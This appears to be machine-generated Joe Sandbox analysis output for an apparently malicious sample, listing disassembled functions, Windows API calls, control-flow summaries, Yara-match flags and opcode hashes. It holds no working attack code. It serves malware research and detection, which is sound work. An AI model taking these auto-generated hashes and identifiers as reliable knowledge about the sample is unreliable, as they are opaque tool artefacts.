                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                      • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                      • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                      • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                                      Function 01102C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                      • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                      • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                      • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                      Function 01102CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                      • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                      • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                      • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                      Function 01102F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                      • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                                      • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                      • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                                      Function 01102F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                      • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                                      • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                      • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                                      Function 01102FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                      • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                                      • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                      • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                                      Function 01102FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                      • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                                      • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                      • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                                      Function 01102E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                      • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                                      • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                      • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                                      Function 01102EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                      • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
                                                      • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                      • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                                      Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f6ba40f36a446a34926a16e13db83a472e6b0eb4014504b183b686ffc875886
                                                      • Instruction ID: aa195f0a0af1fd99cd61e52985a94cc4508177482d9610c79777d473fbad4be0
                                                      • Opcode Fuzzy Hash: 9f6ba40f36a446a34926a16e13db83a472e6b0eb4014504b183b686ffc875886
                                                      • Instruction Fuzzy Hash: D1213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                      Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A65D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &EA
                                                      • API String ID: 1279760036-1330915590
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                      Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 204 408309-40835a call 41be60 call 41ca00 call 40ace0 call 414e40 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a470 213->215 216 40838d 213->216 215->216 216->214
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: a9deb499662bcce9bf8bc78a4bb1f1fefe3221ce0d8095465ec87d1be3085402
                                                      • Instruction ID: f3953570c60373893bf72e46575f7e09a002cef20f5442a3f0aca23ab0b73e4b
                                                      • Opcode Fuzzy Hash: a9deb499662bcce9bf8bc78a4bb1f1fefe3221ce0d8095465ec87d1be3085402
                                                      • Instruction Fuzzy Hash: 4C01F531A80368B7E721A6959C43FEE7B2C9B40F84F05015DFF44BA1C2E6E9690542EA
                                                      Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 219 408310-40831f 220 408328-40835a call 41ca00 call 40ace0 call 414e40 219->220 221 408323 call 41be60 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a470 228->230 231 40838d 228->231 230->231 231->229
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 2fef15b3573e963dab4dee3ae98b595d245d4acc25ee333acbb79ae82eec217e
                                                      • Instruction ID: 918bfee87343fa17fe5f753d684441ffefb87cf5ca75bfa6275ae09e86d24780
                                                      • Opcode Fuzzy Hash: 2fef15b3573e963dab4dee3ae98b595d245d4acc25ee333acbb79ae82eec217e
                                                      • Instruction Fuzzy Hash: 99018471A8032C77E721A6959C43FFE776C6B40B94F05012AFF04BA1C1E6E8690546EA
                                                      Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 255 41a662-41a687 call 41af60 257 41a68c-41a6a1 RtlFreeHeap 255->257
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A69D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c43988574fa1a0ba8ae0e4f679689f6ce62e6a11d8302781c80a156eac68f0c0
                                                      • Instruction ID: 54ae2cbc6702ca787e244acd037496ed0edeec7915d4c27fd7eefbb9cddf7d1e
                                                      • Opcode Fuzzy Hash: c43988574fa1a0ba8ae0e4f679689f6ce62e6a11d8302781c80a156eac68f0c0
                                                      • Instruction Fuzzy Hash: 0EE06DB12046096BD718DF59DC44EE73769EF89360F108249F9599B681C630E811CAB0
                                                      Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 258 41a670-41a686 259 41a68c-41a6a1 RtlFreeHeap 258->259 260 41a687 call 41af60 258->260 260->259
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A69D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                      Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 261 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A800
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                      Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                      Function 0041A6A2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: fa1596f2bbfb7b680c3c8b8504543c135f8c06b60b15b46c272c899b100820dc
                                                      • Instruction ID: c387ada20a41deb9c929076bf405961b7e30563edced002ca138f5bb7bc86376
                                                      • Opcode Fuzzy Hash: fa1596f2bbfb7b680c3c8b8504543c135f8c06b60b15b46c272c899b100820dc
                                                      • Instruction Fuzzy Hash: 1EE08675605210ABEB11DF54CC85FD73768EF44750F05819CF9595B541C634A910C7A5
                                                      Function 01102C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                      • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                                      • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                      • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275

                                                      Non-executed Functions

                                                      Function 01142349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                      • Instruction ID: 72d9557832db58db8c063178876e12c19de97fd84b5f83d3155cb4c81a1a36cd
                                                      • Opcode Fuzzy Hash: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                      • Instruction Fuzzy Hash: 17928E71604742AFE729DF19D880FABB7E8BB84B54F04492DFA94D7250D770E884CB92
                                                      Function 010F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                      • corrupted critical section, xrefs: 011354C2
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                      • undeleted critical section in freed memory, xrefs: 0113542B
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                      • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                      • Critical section address., xrefs: 01135502
                                                      • double initialized or corrupted critical section, xrefs: 01135508
                                                      • Invalid debug info address of this critical section, xrefs: 011354B6
                                                      • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                                      • 8, xrefs: 011352E3
                                                      • Thread identifier, xrefs: 0113553A
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                      • Instruction ID: 62c780c157bc2cef7bcd422742a23cd9fac389810e31fe87a28dc7282ad97876
                                                      • Opcode Fuzzy Hash: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                      • Instruction Fuzzy Hash: 58819EB1A40349EFDB68CF99C845BEEBBB6BB48B14F50811AF544BB680D375A940CB50
                                                      Function 010F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • @, xrefs: 0113259B
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      • Opcode ID: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                      • Instruction ID: 9e3c4d930c0cbc607cb50ece130f3309cebea4ca5aa2bf45f229dd87b93b8807
                                                      • Opcode Fuzzy Hash: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                      • Instruction Fuzzy Hash: 85027EF1D002299BDB25DB54CC81BDEB7B8AF44704F4041EAE749A7241EB70AE84CF99
                                                      Function 01168B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      • Opcode ID: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                      • Instruction ID: 85e1424fc571a3fbf4b00e5df0cd0a9d7d61af5d3f339bdd0a73e5aa3d1d5929
                                                      • Opcode Fuzzy Hash: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                      • Instruction Fuzzy Hash: EC51EF715143019BC72DDF18C844BABBBECFFA8244F14491DEA98C7284E7B1D618CBA2
                                                      Function 01170274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
